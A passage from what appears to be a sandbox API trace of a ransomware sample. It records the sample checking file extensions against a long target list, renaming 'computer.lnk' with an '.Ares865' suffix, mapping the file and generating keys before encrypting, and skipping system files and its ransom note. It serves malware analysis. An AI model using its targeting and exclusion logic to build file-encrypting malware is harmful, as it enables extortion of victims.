(lpString1="lnk", lpString2="vdi") returned -1 [0058.481] lstrlenW (lpString="vhd") returned 3 [0058.481] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0058.481] lstrlenW (lpString="vhdx") returned 4 [0058.481] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0058.481] lstrlenW (lpString="avhd") returned 4 [0058.481] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0058.481] lstrlenW (lpString="db") returned 2 [0058.481] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0058.481] lstrlenW (lpString="db2") returned 3 [0058.481] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0058.481] lstrlenW (lpString="db3") returned 3 [0058.481] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0058.482] lstrlenW (lpString="dbf") returned 3 [0058.482] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0058.482] lstrlenW (lpString="mdf") returned 3 [0058.482] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0058.482] lstrlenW (lpString="mdb") returned 3 [0058.482] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0058.482] lstrlenW (lpString="sql") returned 3 [0058.482] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0058.482] lstrlenW (lpString="sqlite") returned 6 [0058.482] lstrcmpiW (lpString1="er.lnk", lpString2="sqlite") returned -1 [0058.482] lstrlenW (lpString="sqlite3") returned 7 [0058.482] lstrcmpiW (lpString1="ter.lnk", lpString2="sqlite3") returned 1 [0058.482] lstrlenW (lpString="sqlitedb") returned 8 [0058.482] lstrcmpiW (lpString1="uter.lnk", lpString2="sqlitedb") returned 1 [0058.482] lstrlenW (lpString="xml") returned 3 [0058.482] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0058.482] lstrlenW (lpString="$er") returned 3 [0058.482] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0058.482] lstrlenW (lpString="4dd") returned 3 [0058.482] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0058.482] lstrlenW (lpString="4dl") returned 3 [0058.482] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0058.482] lstrlenW (lpString="^^^") returned 3 [0058.482] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0058.482] lstrlenW (lpString="abs") returned 3 [0058.482] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0058.482] lstrlenW (lpString="abx") returned 3 [0058.482] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0058.482] lstrlenW (lpString="accdb") returned 5 [0058.482] lstrcmpiW (lpString1="r.lnk", lpString2="accdb") returned 1 [0058.482] lstrlenW (lpString="accdc") returned 5 [0058.482] lstrcmpiW (lpString1="r.lnk", lpString2="accdc") returned 1 [0058.482] lstrlenW (lpString="accde") returned 5 [0058.482] lstrcmpiW (lpString1="r.lnk", lpString2="accde") returned 1 [0058.482] lstrlenW (lpString="accdr") returned 5 [0058.482] lstrcmpiW (lpString1="r.lnk", lpString2="accdr") returned 1 [0058.483] lstrlenW (lpString="accdt") returned 5 [0058.483] lstrcmpiW (lpString1="r.lnk", lpString2="accdt") returned 1 [0058.483] lstrlenW (lpString="accdw") returned 5 [0058.483] lstrcmpiW (lpString1="r.lnk", lpString2="accdw") returned 1 [0058.483] lstrlenW (lpString="accft") returned 5 [0058.483] lstrcmpiW (lpString1="r.lnk", lpString2="accft") returned 1 [0058.483] lstrlenW (lpString="adb") returned 3 [0058.483] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0058.483] lstrlenW (lpString="adb") returned 3 [0058.483] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0058.483] lstrlenW (lpString="ade") returned 3 [0058.483] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0058.483] lstrlenW (lpString="adf") returned 3 [0058.483] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0058.483] lstrlenW (lpString="adn") returned 3 [0058.483] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0058.483] lstrlenW (lpString="adp") returned 3 [0058.483] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0058.483] lstrlenW (lpString="alf") returned 3 [0058.483] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0058.483] lstrlenW (lpString="ask") returned 3 [0058.483] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0058.483] lstrlenW (lpString="btr") returned 3 [0058.483] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0058.483] lstrlenW (lpString="cat") returned 3 [0058.483] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0058.483] lstrlenW (lpString="cdb") returned 3 [0058.483] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0058.483] lstrlenW (lpString="ckp") returned 3 [0058.483] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0058.483] lstrlenW (lpString="cma") returned 3 [0058.483] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0058.483] lstrlenW (lpString="cpd") returned 3 [0058.483] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0058.483] lstrlenW (lpString="dacpac") returned 6 [0058.483] lstrcmpiW (lpString1="er.lnk", lpString2="dacpac") returned 1 [0058.483] lstrlenW (lpString="dad") returned 3 [0058.484] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0058.484] lstrlenW (lpString="dadiagrams") returned 10 [0058.484] lstrcmpiW (lpString1="mputer.lnk", lpString2="dadiagrams") returned 1 [0058.484] lstrlenW (lpString="daschema") returned 8 [0058.484] lstrcmpiW (lpString1="uter.lnk", lpString2="daschema") returned 1 [0058.484] lstrlenW (lpString="db-journal") returned 10 [0058.484] lstrcmpiW (lpString1="mputer.lnk", lpString2="db-journal") returned 1 [0058.484] lstrlenW (lpString="db-shm") returned 6 [0058.484] lstrcmpiW (lpString1="er.lnk", lpString2="db-shm") returned 1 [0058.484] lstrlenW (lpString="db-wal") returned 6 [0058.484] lstrcmpiW (lpString1="er.lnk", lpString2="db-wal") returned 1 [0058.484] lstrlenW (lpString="dbc") returned 3 [0058.484] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0058.484] lstrlenW (lpString="dbs") returned 3 [0058.484] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0058.484] lstrlenW (lpString="dbt") returned 3 [0058.484] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0058.484] lstrlenW (lpString="dbv") returned 3 [0058.484] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0058.484] lstrlenW (lpString="dbx") returned 3 [0058.484] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0058.484] lstrlenW (lpString="dcb") returned 3 [0058.484] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0058.484] lstrlenW (lpString="dct") returned 3 [0058.484] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0058.484] lstrlenW (lpString="dcx") returned 3 [0058.484] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0058.484] lstrlenW (lpString="ddl") returned 3 [0058.484] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0058.484] lstrlenW (lpString="dlis") returned 4 [0058.484] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0058.484] lstrlenW (lpString="dp1") returned 3 [0058.484] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0058.484] lstrlenW (lpString="dqy") returned 3 [0058.484] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0058.484] lstrlenW (lpString="dsk") returned 3 [0058.484] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0058.484] lstrlenW (lpString="dsn") returned 3 [0058.485] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0058.485] lstrlenW (lpString="dtsx") returned 4 [0058.485] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0058.485] lstrlenW (lpString="dxl") returned 3 [0058.485] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0058.485] lstrlenW (lpString="eco") returned 3 [0058.485] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0058.485] lstrlenW (lpString="ecx") returned 3 [0058.485] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0058.485] lstrlenW (lpString="edb") returned 3 [0058.485] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0058.485] lstrlenW (lpString="epim") returned 4 [0058.485] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0058.485] lstrlenW (lpString="fcd") returned 3 [0058.485] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0058.485] lstrlenW (lpString="fdb") returned 3 [0058.485] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0058.485] lstrlenW (lpString="fic") returned 3 [0058.485] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0058.485] lstrlenW (lpString="flexolibrary") returned 12 [0058.485] lstrlenW (lpString="fm5") returned 3 [0058.485] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0058.485] lstrlenW (lpString="fmp") returned 3 [0058.485] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0058.485] lstrlenW (lpString="fmp12") returned 5 [0058.485] lstrcmpiW (lpString1="r.lnk", lpString2="fmp12") returned 1 [0058.485] lstrlenW (lpString="fmpsl") returned 5 [0058.485] lstrcmpiW (lpString1="r.lnk", lpString2="fmpsl") returned 1 [0058.485] lstrlenW (lpString="fol") returned 3 [0058.485] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0058.485] lstrlenW (lpString="fp3") returned 3 [0058.485] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0058.485] lstrlenW (lpString="fp4") returned 3 [0058.485] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0058.485] lstrlenW (lpString="fp5") returned 3 [0058.485] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0058.485] lstrlenW (lpString="fp7") returned 3 [0058.485] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0058.486] lstrlenW (lpString="fpt") returned 3 [0058.486] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0058.486] lstrlenW (lpString="frm") returned 3 [0058.486] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0058.486] lstrlenW (lpString="gdb") returned 3 [0058.486] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0058.486] lstrlenW (lpString="gdb") returned 3 [0058.486] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0058.486] lstrlenW (lpString="grdb") returned 4 [0058.486] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0058.486] lstrlenW (lpString="gwi") returned 3 [0058.486] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0058.486] lstrlenW (lpString="hdb") returned 3 [0058.486] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0058.486] lstrlenW (lpString="his") returned 3 [0058.486] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0058.486] lstrlenW (lpString="ib") returned 2 [0058.486] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0058.486] lstrlenW (lpString="idb") returned 3 [0058.486] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0058.486] lstrlenW (lpString="ihx") returned 3 [0058.486] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0058.486] lstrlenW (lpString="itdb") returned 4 [0058.486] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0058.486] lstrlenW (lpString="itw") returned 3 [0058.486] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0058.486] lstrlenW (lpString="jet") returned 3 [0058.486] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0058.486] lstrlenW (lpString="jtx") returned 3 [0058.486] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0058.486] lstrlenW (lpString="kdb") returned 3 [0058.486] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0058.486] lstrlenW (lpString="kexi") returned 4 [0058.486] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0058.486] lstrlenW (lpString="kexic") returned 5 [0058.486] lstrcmpiW (lpString1="r.lnk", lpString2="kexic") returned 1 [0058.487] lstrlenW (lpString="kexis") returned 5 [0058.487] lstrcmpiW (lpString1="r.lnk", lpString2="kexis") returned 1 [0058.487] lstrlenW (lpString="lgc") returned 3 [0058.487] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0058.487] lstrlenW (lpString="lwx") returned 3 [0058.487] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0058.487] lstrlenW (lpString="maf") returned 3 [0058.487] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0058.487] lstrlenW (lpString="maq") returned 3 [0058.487] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0058.487] lstrlenW (lpString="mar") returned 3 [0058.487] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0058.487] lstrlenW (lpString="marshal") returned 7 [0058.487] lstrcmpiW (lpString1="ter.lnk", lpString2="marshal") returned 1 [0058.487] lstrlenW (lpString="mas") returned 3 [0058.487] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0058.487] lstrlenW (lpString="mav") returned 3 [0058.487] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0058.487] lstrlenW (lpString="maw") returned 3 [0058.487] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0058.487] lstrlenW (lpString="mdbhtml") returned 7 [0058.487] lstrcmpiW (lpString1="ter.lnk", lpString2="mdbhtml") returned 1 [0058.487] lstrlenW (lpString="mdn") returned 3 [0058.487] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0058.487] lstrlenW (lpString="mdt") returned 3 [0058.487] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0058.487] lstrlenW (lpString="mfd") returned 3 [0058.487] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0058.487] lstrlenW (lpString="mpd") returned 3 [0058.487] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0058.487] lstrlenW (lpString="mrg") returned 3 [0058.487] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0058.487] lstrlenW (lpString="mud") returned 3 [0058.487] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0058.487] lstrlenW (lpString="mwb") returned 3 [0058.487] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0058.487] lstrlenW (lpString="myd") returned 3 [0058.488] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0058.488] lstrlenW (lpString="ndf") returned 3 [0058.488] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0058.488] lstrlenW (lpString="nnt") returned 3 [0058.488] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0058.488] lstrlenW (lpString="nrmlib") returned 6 [0058.488] lstrcmpiW (lpString1="er.lnk", lpString2="nrmlib") returned -1 [0058.488] lstrlenW (lpString="ns2") returned 3 [0058.488] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0058.488] lstrlenW (lpString="ns3") returned 3 [0058.488] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0058.488] lstrlenW (lpString="ns4") returned 3 [0058.488] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0058.488] lstrlenW (lpString="nsf") returned 3 [0058.488] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0058.488] lstrlenW (lpString="nv") returned 2 [0058.488] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0058.488] lstrlenW (lpString="nv2") returned 3 [0058.488] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0058.488] lstrlenW (lpString="nwdb") returned 4 [0058.488] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0058.488] lstrlenW (lpString="nyf") returned 3 [0058.488] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0058.488] lstrlenW (lpString="odb") returned 3 [0058.488] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0058.488] lstrlenW (lpString="odb") returned 3 [0058.488] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0058.488] lstrlenW (lpString="oqy") returned 3 [0058.488] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0058.488] lstrlenW (lpString="ora") returned 3 [0058.488] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0058.488] lstrlenW (lpString="orx") returned 3 [0058.488] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0058.488] lstrlenW (lpString="owc") returned 3 [0058.488] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0058.488] lstrlenW (lpString="p96") returned 3 [0058.488] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0058.489] lstrlenW (lpString="p97") returned 3 [0058.489] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0058.489] lstrlenW (lpString="pan") returned 3 [0058.489] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0058.489] lstrlenW (lpString="pdb") returned 3 [0058.489] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0058.489] lstrlenW (lpString="pdm") returned 3 [0058.489] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0058.489] lstrlenW (lpString="pnz") returned 3 [0058.489] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0058.489] lstrlenW (lpString="qry") returned 3 [0058.489] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0058.489] lstrlenW (lpString="qvd") returned 3 [0058.489] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0058.489] lstrlenW (lpString="rbf") returned 3 [0058.489] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0058.489] lstrlenW (lpString="rctd") returned 4 [0058.489] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0058.489] lstrlenW (lpString="rod") returned 3 [0058.489] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0058.489] lstrlenW (lpString="rodx") returned 4 [0058.489] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0058.489] lstrlenW (lpString="rpd") returned 3 [0058.489] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0058.489] lstrlenW (lpString="rsd") returned 3 [0058.489] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0058.489] lstrlenW (lpString="sas7bdat") returned 8 [0058.489] lstrcmpiW (lpString1="uter.lnk", lpString2="sas7bdat") returned 1 [0058.489] lstrlenW (lpString="sbf") returned 3 [0058.489] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0058.489] lstrlenW (lpString="scx") returned 3 [0058.489] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0058.489] lstrlenW (lpString="sdb") returned 3 [0058.489] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0058.489] lstrlenW (lpString="sdc") returned 3 [0058.489] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0058.489] lstrlenW (lpString="sdf") returned 3 [0058.489] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0058.490] lstrlenW (lpString="sis") returned 3 [0058.490] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0058.490] lstrlenW (lpString="spq") returned 3 [0058.490] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0058.490] lstrlenW (lpString="te") returned 2 [0058.490] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0058.490] lstrlenW (lpString="teacher") returned 7 [0058.490] lstrcmpiW (lpString1="ter.lnk", lpString2="teacher") returned 1 [0058.490] lstrlenW (lpString="tmd") returned 3 [0058.490] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0058.490] lstrlenW (lpString="tps") returned 3 [0058.490] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0058.490] lstrlenW (lpString="trc") returned 3 [0058.490] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0058.490] lstrlenW (lpString="trc") returned 3 [0058.490] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0058.490] lstrlenW (lpString="trm") returned 3 [0058.490] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0058.490] lstrlenW (lpString="udb") returned 3 [0058.490] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0058.490] lstrlenW (lpString="udl") returned 3 [0058.490] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0058.490] lstrlenW (lpString="usr") returned 3 [0058.490] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0058.490] lstrlenW (lpString="v12") returned 3 [0058.490] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0058.490] lstrlenW (lpString="vis") returned 3 [0058.490] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0058.490] lstrlenW (lpString="vpd") returned 3 [0058.490] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0058.490] lstrlenW (lpString="vvv") returned 3 [0058.490] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0058.490] lstrlenW (lpString="wdb") returned 3 [0058.490] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0058.490] lstrlenW (lpString="wmdb") returned 4 [0058.490] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0058.491] lstrlenW (lpString="wrk") returned 3 [0058.491] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0058.491] lstrlenW (lpString="xdb") returned 3 [0058.491] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0058.491] lstrlenW (lpString="xld") returned 3 [0058.491] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0058.491] lstrlenW (lpString="xmlff") returned 5 [0058.491] lstrcmpiW (lpString1="r.lnk", lpString2="xmlff") returned -1 [0058.491] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk.Ares865") returned 87 [0058.491] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\system tools\\computer.lnk"), lpNewFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\system tools\\computer.lnk.ares865"), dwFlags=0x1) returned 1 [0058.492] CreateFileW (lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\system tools\\computer.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0058.492] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=262) returned 1 [0058.492] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.492] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0058.492] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0058.492] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0058.493] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0058.493] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.493] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x410, lpName=0x0) returned 0x120 [0058.498] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x410) returned 0x190000 [0058.500] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0058.500] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0058.500] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.500] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0058.500] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0058.500] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.500] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.500] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.500] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.501] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.501] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.501] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.501] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.501] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.501] CloseHandle (hObject=0x120) returned 1 [0058.501] CloseHandle (hObject=0x15c) returned 1 [0058.502] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0058.502] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0058.502] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.502] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7dd8af29, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e084aaf, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x106, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Control Panel.lnk", cAlternateFileName="CONTRO~1.LNK")) returned 1 [0058.503] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.503] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="aoldtz.exe") returned 1 [0058.503] lstrcmpiW (lpString1="Control Panel.lnk", lpString2=".") returned 1 [0058.503] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="..") returned 1 [0058.503] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="windows") returned -1 [0058.503] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="bootmgr") returned 1 [0058.503] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="temp") returned -1 [0058.503] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="pagefile.sys") returned -1 [0058.503] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="boot") returned 1 [0058.503] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="ids.txt") returned -1 [0058.503] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="ntuser.dat") returned -1 [0058.503] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="perflogs") returned -1 [0058.503] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="MSBuild") returned -1 [0058.503] lstrlenW (lpString="Control Panel.lnk") returned 17 [0058.503] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk") returned 79 [0058.503] lstrcpyW (in: lpString1=0x2cce486, lpString2="Control Panel.lnk" | out: lpString1="Control Panel.lnk") returned="Control Panel.lnk" [0058.503] lstrlenW (lpString="Control Panel.lnk") returned 17 [0058.503] lstrlenW (lpString="Ares865") returned 7 [0058.503] lstrcmpiW (lpString1="nel.lnk", lpString2="Ares865") returned 1 [0058.503] lstrlenW (lpString=".dll") returned 4 [0058.503] lstrcmpiW (lpString1="Control Panel.lnk", lpString2=".dll") returned 1 [0058.503] lstrlenW (lpString=".lnk") returned 4 [0058.503] lstrcmpiW (lpString1="Control Panel.lnk", lpString2=".lnk") returned 1 [0058.503] lstrlenW 